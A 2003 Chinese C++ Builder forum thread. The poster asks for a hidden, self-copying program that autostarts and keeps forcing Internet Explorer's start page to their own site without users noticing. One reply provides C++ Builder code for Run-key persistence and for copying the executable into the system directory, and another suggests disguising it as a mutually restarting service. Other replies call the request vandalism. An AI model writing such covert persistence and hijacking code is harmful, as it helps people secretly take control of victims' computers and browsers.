谁能帮帮我!快啊!

topsky365 2003-11-04 04:16:14
你好:
最近我想搞一个程序,但是由于没有编程环境,所以只好请各位帮忙了!
程序要求如下:开机自运行,后台运行并隐藏进程,每隔5秒钟把注册表的“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main”下的“Start Page”键值改为:“http://topsky.wx-e.com/search.htm” (我希望这个程序不会被用户察觉,所以越隐蔽越好)
忘记一点:程序运行时要在系统目录下释放一个自身文件用于下次开机自动运行!大概就这么多了希望那位高手能帮我着一个忙!谢啦!请做好后发到我的信箱里zhangzhi3884@mail.china.com
...全文
54 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
zihan 2003-11-07
  • 打赏
  • 举报
回复
呵呵,其实我不坏,人家都说我是一个好男人啊。真的


我晕,我笑,哈哈哈哈哈,佛曰:我不入地狱谁入地狱啊!
52vc 2003-11-04
  • 打赏
  • 举报
回复
):
warton 2003-11-04
  • 打赏
  • 举报
回复
子寒是大坏蛋,我也是!:)
warton 2003-11-04
  • 打赏
  • 举报
回复
小儿科,破坏也起不到多大作用!呵呵!
这种程序网上到处都是!
要隐藏做成服务,要么再用一个服务去监视,呵呵,互相启动!
Atomictry 2003-11-04
  • 打赏
  • 举报
回复
子寒也真是的,这家伙,明显是在搞破坏。
支持pp
pp616 2003-11-04
  • 打赏
  • 举报
回复
你干什么要修改别人主页。真混蛋。
比我要坏多了。
zihan 2003-11-04
  • 打赏
  • 举报
回复
第一个,用写注册表的方式,就是run下面,然后就可以每次启动的时候都可以开机自动运行 ,例子 TRegistry *Registry=new TRegistry;
try{
Registry->RootKey=HKEY_LOCAL_MACHINE;
Registry->OpenKey("software\\microsoft\\windows\\currentversion\\run\\",true);
Registry->WriteString("default",path);
}
__finally
{
delete Registry;
}
其中defalut可以任意更改,path表示你的应用程序的名称,可以用Application->ExeName;来代替
你修改的时候也可以这样,只是把上面的路径换一下可以了,如果要定时检查,用一个定时器就可以了,如果要释放到系统目录
AnsiString path,path2;
char lp[64];
GetSystemDirectory(lp,sizeof(lp));
command=lp;
path=command+"\\"+ExtractFileName(Application->ExeName);
if(!FileExists(path))
{
path2=Application->ExeName;
CopyFile(path2.c_str(),path.c_str(),0);
}
叶子哟 2003-11-04
  • 打赏
  • 举报
回复
这也难呀?自已好好找找资料,主要知识点:注册表,自动运行,或是服务程序,资源打包等

1,316

社区成员

发帖
与我相关
我的任务
社区描述
C++ Builder 网络及通讯开发
社区管理员
  • 网络及通讯开发社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧